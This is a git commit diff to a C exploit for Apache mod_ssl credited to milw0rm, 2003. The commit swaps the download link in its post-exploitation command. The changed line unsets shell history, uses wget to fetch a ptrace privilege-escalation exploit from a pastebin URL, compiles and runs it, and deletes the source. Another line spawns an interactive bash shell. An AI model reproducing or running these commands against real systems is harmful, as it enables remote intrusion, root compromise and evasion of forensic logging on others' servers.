Update the link

It is copied to a pastebin since it is unable to be downloaded from packetstormsecurity
This commit is contained in:
AgentWhite
2020-05-08 11:26:00 -04:00
committed by GitHub
parent d75fd2d853
commit d77a8664ff

View File

@@ -668,7 +668,9 @@ typedef struct {
} ssl_conn;
#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
// #define COMMAND2 "unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://pastebin.com/raw/C7v25Xr9 -O ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
long getip(char *hostname) {
struct hostent *he;
@@ -1304,4 +1306,4 @@ int main(int argc, char* argv[])
}
/* spabam: It isn't 0day */
// milw0rm.com [2003-04-04]
// milw0rm.com [2003-04-04]